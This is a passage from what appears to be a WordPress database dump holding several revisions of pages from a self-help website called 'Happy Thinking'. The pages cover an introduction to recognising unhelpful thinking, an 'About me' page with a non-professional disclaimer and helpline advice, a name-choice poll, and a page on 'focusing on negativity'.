-->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to continue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1346} /-->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-04-10 12:25:44', '2023-04-10 12:25:44', '', 1034, 'https://www.happythinking.com/?p=1545', 0, 'revision', '', 0),
(1548, 1, '2023-04-10 12:29:29', '2023-04-10 12:29:29', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'home_next', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-04-10 12:29:29', '2023-04-10 12:29:29', '', 1346, 'https://www.happythinking.com/?p=1548', 0, 'revision', '', 0),
(1547, 1, '2023-04-10 12:27:41', '2023-04-10 12:27:41', '<!-- wp:paragraph -->\n<p>Before we proceed, it is important that you get to know a bit about who I am (and who I am not!). Your mind is very precious and I would like you to know something about me before you trust me.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I must emphasise to you that I am not a mental health professional and I do not have formal qualifications in the subject. So, please take the information on this website at your own risk (please read the disclaimer section of this website for more details).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now you may ask, â€œWhat qualifies me to run this website?â€ Well, perhaps like yourself, I too have been pondering about how to be happy. In my life, I have faced various challenges that have kept my mind often in an unhappy state. Over years, I have thought about this issue and wondered if I could come up with a practical and easy to understand way of dealing with it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I soon realised that the way oneâ€™s mind â€œthinksâ€, can play an important role if one is happy or not. When faced with challenges, I noticed that there seemed to be certain unhelpful ways of thinking that my mind did that caused me to be unhappy. I then thought that maybe an idea would be to deal with the issue like an engineer would deal with a faulty machine: i.e. recognise unhelpful ways of thinking and use tools to fix such thinking. So over years, I learnt about the various unhelpful ways of thinking that oneâ€™s mind may do and then researched and experimented with various mental techniques (i.e. tools) that I could use to deal with such thinking. Having benefited from these techniques greatly, I felt that I should share such insights with others. I, therefore, made this website to fulfil this desire of sharing, with the hope that it will benefit many.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When reading the many â€œself helpâ€ books and other resources out there, I often found them to be either too vague or too complex to be of practical value in my day to life. In view of this, my number one focus for this website was to make it easy to understand and give solutions that one can realistically use in oneâ€™s daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I also would like to stress that it is very important that if you are being cared for by a mental health professional, under no circumstances should you change your thinking or medication, without their approval. They are trained individuals unlike me, and also, suddenly changing medication can be very dangerous. On the other hand, please do share this website with them and please let me know what they think of it! Also, unfortunately, suicide is a very real risk in some and if you feel in any way inclined to do so, please contact professional helplines in your country and also seek out friends and family. Things may feel very low, but once someone lifts you up a bit, you will realise that there is hope.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So while I would like to make it clear that this website does not provide professional advice, I hope that you will assess the simple ideas I will present to you and if you find them sensible, use them in your life to make yourself a happier person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I have kept this website free so that everyone can benefit. However, if you are able to make a small donation equal to about a dollar, I would be very grateful if you would do so by clicking on the donate tab at the top of the screen. You can click on the donate tab from any page.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim is for you to be happy and I am confident that the material on this website will help you to think in ways that will make you happy (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to go to the next section.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1346} /-->', 'About me', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2023-04-10 12:27:41', '2023-04-10 12:27:41', '', 466, 'https://www.happythinking.com/?p=1547', 0, 'revision', '', 0),
(1609, 1, '2023-05-30 17:08:18', '2023-05-30 17:08:18', '<!-- wp:paragraph -->\n<p>Before we proceed, it is important that you get to know a bit about who I am (and who I am not!). Your mind is very precious and I would like you to know something about me before you trust me.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I must emphasise to you that I am not a mental health professional and I do not have formal qualifications in the subject. So, please take the information on this website at your own risk (please read the disclaimer section of this website for more details).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now you may ask, â€œWhat qualifies me to run this website?â€ Well, perhaps like yourself, I too have been pondering about how to be happy. In my life, I have faced various challenges that have kept my mind often in an unhappy state. Over the years, I have thought about this issue and wondered if I could come up with a practical and easy to understand way of dealing with it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I soon realised that the way oneâ€™s mind â€œthinksâ€, can play an important role if one is happy or not. When faced with challenges, I noticed that there seemed to be certain unhelpful ways of thinking that my mind did that caused me to be unhappy. I then thought that maybe an idea would be to deal with the issue like an engineer would deal with a faulty machine: i.e. recognise unhelpful ways of thinking and use tools to fix such thinking. So over the years, I learnt about the various unhelpful ways of thinking that oneâ€™s mind may do and then researched and experimented with various mental techniques (i.e. tools) that I could use to deal with such thinking. Having benefited from these techniques greatly, I felt that I should share such insights with others. I, therefore, made this website to fulfil this desire of sharing, with the hope that it will benefit many.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When reading the many â€œself helpâ€ books and other resources out there, I often found them to be either too vague or too complex to be of practical value in my day to life. In view of this, my number one focus for this website was to make it easy to understand and give solutions that one can realistically use in oneâ€™s daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I also would like to stress that it is very important that if you are being cared for by a mental health professional, under no circumstances should you change your thinking or medication, without their approval. They are trained individuals unlike me, and also, suddenly changing medication can be very dangerous. On the other hand, please do share this website with them and please let me know what they think of it! Also, unfortunately, suicide is a very real risk in some and if you feel in any way inclined to do so, please contact professional helplines in your country and also seek out friends and family. Things may feel very low, but once someone lifts you up a bit, you will realise that there is hope.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So while I would like to make it clear that this website does not provide professional advice, I hope that you will assess the simple ideas I will present to you and if you find them sensible, use them in your life to make yourself a happier person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I have kept this website free so that everyone can benefit. However, if you are able to make a small donation equal to about a dollar, I would be very grateful if you would do so by clicking on the donate tab at the top of the screen. You can click on the donate tab from any page.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim is for you to be happy and I am confident that the material on this website will help you to think in ways that will make you happy (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'About me', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2023-05-30 17:08:18', '2023-05-30 17:08:18', '', 466, 'https://www.happythinking.com/?p=1609', 0, 'revision', '', 0),
(1551, 1, '2023-04-10 12:34:44', '2023-04-10 12:34:44', '<!-- wp:paragraph -->\n<p>Before we proceed, it is important that you get to know a bit about who I am (and who I am not!). Your mind is very precious and I would like you to know something about me before you trust me.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I must emphasise to you that I am not a mental health professional and I do not have formal qualifications in the subject. So, please take the information on this website at your own risk (please read the disclaimer section of this website for more details).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now you may ask, â€œWhat qualifies me to run this website?â€ Well, perhaps like yourself, I too have been pondering about how to be happy. In my life, I have faced various challenges that have kept my mind often in an unhappy state. Over years, I have thought about this issue and wondered if I could come up with a practical and easy to understand way of dealing with it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I soon realised that the way oneâ€™s mind â€œthinksâ€, can play an important role if one is happy or not. When faced with challenges, I noticed that there seemed to be certain unhelpful ways of thinking that my mind did that caused me to be unhappy. I then thought that maybe an idea would be to deal with the issue like an engineer would deal with a faulty machine: i.e. recognise unhelpful ways of thinking and use tools to fix such thinking. So over years, I learnt about the various unhelpful ways of thinking that oneâ€™s mind may do and then researched and experimented with various mental techniques (i.e. tools) that I could use to deal with such thinking. Having benefited from these techniques greatly, I felt that I should share such insights with others. I, therefore, made this website to fulfil this desire of sharing, with the hope that it will benefit many.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When reading the many â€œself helpâ€ books and other resources out there, I often found them to be either too vague or too complex to be of practical value in my day to life. In view of this, my number one focus for this website was to make it easy to understand and give solutions that one can realistically use in oneâ€™s daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I also would like to stress that it is very important that if you are being cared for by a mental health professional, under no circumstances should you change your thinking or medication, without their approval. They are trained individuals unlike me, and also, suddenly changing medication can be very dangerous. On the other hand, please do share this website with them and please let me know what they think of it! Also, unfortunately, suicide is a very real risk in some and if you feel in any way inclined to do so, please contact professional helplines in your country and also seek out friends and family. Things may feel very low, but once someone lifts you up a bit, you will realise that there is hope.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So while I would like to make it clear that this website does not provide professional advice, I hope that you will assess the simple ideas I will present to you and if you find them sensible, use them in your life to make yourself a happier person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I have kept this website free so that everyone can benefit. However, if you are able to make a small donation equal to about a dollar, I would be very grateful if you would do so by clicking on the donate tab at the top of the screen. You can click on the donate tab from any page.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim is for you to be happy and I am confident that the material on this website will help you to think in ways that will make you happy (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to go to the next section.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'About me', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2023-04-10 12:34:44', '2023-04-10 12:34:44', '', 466, 'https://www.happythinking.com/?p=1551', 0, 'revision', '', 0),
(1550, 1, '2023-04-10 12:33:18', '2023-04-10 12:33:18', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œhappy thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to continue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-04-10 12:33:18', '2023-04-10 12:33:18', '', 1034, 'https://www.happythinking.com/?p=1550', 0, 'revision', '', 0),
(1970, 1, '2023-06-26 10:27:53', '2023-06-26 10:27:53', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Before proceeding, grateful if will click on the name below that you think is nice for a website about a monk advising a person on how to be happy. Thanks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-26 10:27:53', '2023-06-26 10:27:53', '', 1910, 'https://www.happythinking.com/?p=1970', 0, 'revision', '', 0),
(1968, 1, '2023-06-26 07:38:35', '2023-06-26 07:38:35', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Hello! I am the author of this website. I will be very grateful for a small favour (not money!) that will take you only a few seconds! Apart from this website, I want to make a website of a story in which a wise monk guides a person towards happiness. I need to choose a nice name for the website that will have this story. I have managed to get the website names shown below, but am not sure which one is best. I will be grateful if you will help me to decide which name to use by selecting the name below that you think is better. Your answer will really help me to decide. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-26 07:38:35', '2023-06-26 07:38:35', '', 1910, 'https://www.happythinking.com/?p=1968', 0, 'revision', '', 0),
(1554, 1, '2023-04-10 12:37:35', '2023-04-10 12:37:35', '<!-- wp:paragraph -->\n<p>Before we proceed, it is important that you get to know a bit about who I am (and who I am not!). Your mind is very precious and I would like you to know something about me before you trust me.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I must emphasise to you that I am not a mental health professional and I do not have formal qualifications in the subject. So, please take the information on this website at your own risk (please read the disclaimer section of this website for more details).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now you may ask, â€œWhat qualifies me to run this website?â€ Well, perhaps like yourself, I too have been pondering about how to be happy. In my life, I have faced various challenges that have kept my mind often in an unhappy state. Over years, I have thought about this issue and wondered if I could come up with a practical and easy to understand way of dealing with it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I soon realised that the way oneâ€™s mind â€œthinksâ€, can play an important role if one is happy or not. When faced with challenges, I noticed that there seemed to be certain unhelpful ways of thinking that my mind did that caused me to be unhappy. I then thought that maybe an idea would be to deal with the issue like an engineer would deal with a faulty machine: i.e. recognise unhelpful ways of thinking and use tools to fix such thinking. So over years, I learnt about the various unhelpful ways of thinking that oneâ€™s mind may do and then researched and experimented with various mental techniques (i.e. tools) that I could use to deal with such thinking. Having benefited from these techniques greatly, I felt that I should share such insights with others. I, therefore, made this website to fulfil this desire of sharing, with the hope that it will benefit many.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When reading the many â€œself helpâ€ books and other resources out there, I often found them to be either too vague or too complex to be of practical value in my day to life. In view of this, my number one focus for this website was to make it easy to understand and give solutions that one can realistically use in oneâ€™s daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I also would like to stress that it is very important that if you are being cared for by a mental health professional, under no circumstances should you change your thinking or medication, without their approval. They are trained individuals unlike me, and also, suddenly changing medication can be very dangerous. On the other hand, please do share this website with them and please let me know what they think of it! Also, unfortunately, suicide is a very real risk in some and if you feel in any way inclined to do so, please contact professional helplines in your country and also seek out friends and family. Things may feel very low, but once someone lifts you up a bit, you will realise that there is hope.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So while I would like to make it clear that this website does not provide professional advice, I hope that you will assess the simple ideas I will present to you and if you find them sensible, use them in your life to make yourself a happier person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I have kept this website free so that everyone can benefit. However, if you are able to make a small donation equal to about a dollar, I would be very grateful if you would do so by clicking on the donate tab at the top of the screen. You can click on the donate tab from any page.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim is for you to be happy and I am confident that the material on this website will help you to think in ways that will make you happy (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to go to the next section.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/unhelpful_thinking/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'About me', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2023-04-10 12:37:35', '2023-04-10 12:37:35', '', 466, 'https://www.happythinking.com/?p=1554', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1616, 1, '2023-05-30 17:32:03', '2023-05-30 17:32:03', '<!-- wp:paragraph -->\n<p>Letâ€™s now start getting to know the various types of unhelpful thinking that people do. The first one is what I call â€œfocusing on negativityâ€. This is a very common type of unhelpful thinking and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone on the same day as the salary increase).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may excessively focus on negative events while mostly ignoring positive events. In the example I gave, the person may excessively focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of negative thinking can make one feel that things are worse than they really are as positive events that could have countered the negativity are ignored. I call this type of negative thinking, â€œfocusing on negativityâ€ (psychologists will call it the â€œnegativity effectâ€).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would be to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, itâ€™s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that one of our ancestors was daydreaming and walking without a care in the world, and then accidentally stepped on a tigerâ€™s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1857,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg" alt="" class="wp-image-1857"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If our ancestor survived the ensuing chase, it would have been in his or her survival interest to not forget the negative event of stepping on a tigerâ€™s tail. By focusing on this negative event, our ancestor would have kept remembering the importance of not daydreaming while walking in the forest! While nowadays most of us donâ€™t walk amongst tigers and other dangers in forests, the tendency to focus on negative events may still persist in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1858,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg" alt="" class="wp-image-1858"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Here is a more modern example of the â€œfocusing on negativityâ€ type of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The excessive focus on the negative event made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, itâ€™s important to recognise when you are excessively focusing on negative events. As I mentioned before, Happy Thinking is about dealing with such unhelpful thinking. Once we have gone over the common types of unhelpful thinking, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button 